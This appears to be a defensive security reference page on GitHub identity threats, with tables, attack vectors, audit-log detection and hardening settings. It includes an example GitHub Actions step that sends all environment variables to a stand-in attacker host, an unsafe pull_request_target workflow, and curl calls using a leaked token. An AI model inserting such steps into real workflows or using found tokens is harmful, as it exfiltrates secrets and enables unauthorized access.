GitHub Identity Security
Status: Final
GitHub is critical infrastructure for engineering organizations. Identity compromise in GitHub enables source code theft, secrets exfiltration from repos and CI/CD, and supply chain attacks (malicious code commits, Actions injection).
GitHub Identity Model
| Identity Type | Description |
|---|---|
| User account | Personal GitHub account; member of one or more orgs |
| Organization owner | Full admin over org repos, teams, members, billing |
| Team maintainer | Manage team members and repos assigned to team |
| Repository admin | Full control over specific repos |
| GitHub App | Service identity for integrations; installed at org/repo level |
| Personal Access Token (PAT) | User-scoped API credential |
| Fine-grained PAT | Scoped to specific repos with expiration |
| Deploy key | SSH key for CI/CD access to a specific repo |
| Actions OIDC | Ephemeral tokens for cloud access from Actions workflows |
Authentication Methods
| Method | MFA-Protected | Scope |
|---|---|---|
| Username + password (web) | Yes (if MFA enabled) | Web UI |
| SSH key | No (key-based) | Git operations |
| Personal Access Token (PAT) | No | API + Git |
| Fine-grained PAT | No | API + Git (scoped) |
| GitHub App token | No | App-specific permissions |
| Actions OIDC token | No (ephemeral) | Cloud provider APIs |
Attack Vectors
1. Account Compromise → Org Takeover
Phishing/credential stuffing → user account
↓
If user is org owner → full org control
If user is repo admin → read all code in repos
If user has write access → backdoor code, workflows
After org owner compromise:
- Add attacker as org owner (silent admin)
- Download all private repos
- Modify GitHub Actions workflows to exfiltrate future secrets
- Create/modify deploy keys
2. PAT Exfiltration
# Scan repos for secrets
trufflehog git https://github.com/org/repo
gitleaks detect --source /path/to/repo
# If PAT found:
curl -H "Authorization: token ghp_xxxx" https://api.github.com/user
curl -H "Authorization: token ghp_xxxx" https://api.github.com/orgs/targetorg/repos?per_page=100
3. Actions Secrets / Env Vars Exfiltration
GitHub Actions secrets are injected into workflow runners. Malicious pull requests or compromised workflows can exfiltrate them:
# Malicious workflow step — exfiltrate all environment variables
- name: malicious
run: |
env | curl -X POST https://attacker.com/exfil -d @-
Attacker can also modify GITHUB_TOKEN permissions in workflow to gain broader access.
4. Supply Chain — Malicious Workflow Injection
Pull request from a fork can inject malicious steps:
# Pull request targeting workflow with pull_request_target trigger
# This trigger runs with org secrets even for forks — dangerous
on:
pull_request_target:
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
with:
ref: ${{ github.event.pull_request.head.sha }} # Checks out PR code
- run: make build # Runs attacker's code with repo secrets access
5. Compromised Third-Party Action
# If attacker compromises a pinned Action (tag drift):
- uses: some-org/some-action@v2 # v2 tag could be moved to malicious code
Best practice: pin to commit hash, not tag.
Detection
GitHub Audit Log
# Organization audit log events to monitor:
org.invite_member → New org member added
org.add_member → Member added (accepted invite)
repo.add_member → User given access to specific repo
org.update_member → Role change (member → owner)
personal_access_token.access → PAT used for API call
authentication.failure → Failed logins
GitHub Advanced Security
- Secret scanning: detects known token formats when committed
- Code scanning: static analysis for vulnerabilities
- Dependabot: flag vulnerable dependencies
// GitHub AuditLog (if integrated into Sentinel via connector)
GitHubAuditData
| where Action in ("org.update_member", "team.add_member")
| where AdditionalData has "owner"
| project TimeGenerated, Actor, Action, OrganizationName, AdditionalData
Security Hardening
| Control | Setting |
|---|---|
| Require MFA for org members | Org Settings → Authentication security → Require 2FA |
| Restrict PAT access | Org Settings → Third-party application access policy |
| SAML SSO enforcement | Forces org access through SSO; blocks direct GitHub credential auth |
| Branch protection rules | Require PR review, status checks, signed commits |
| Required reviews for CODEOWNERS | High-value files need explicit review |
| Limit Actions permissions by default | GITHUB_TOKEN should be read by default, not write |
| Pin actions to commit SHA | Prevent tag drift supply chain attacks |
| Audit log streaming | Stream to SIEM for centralized analysis |
Cross-Links
| Topic | Link |
|---|---|
| API Token Abuse | api-token-abuse |
| OAuth App Abuse | oauth-app-abuse |
| Kubernetes — OIDC Federation | k8s-service-accounts |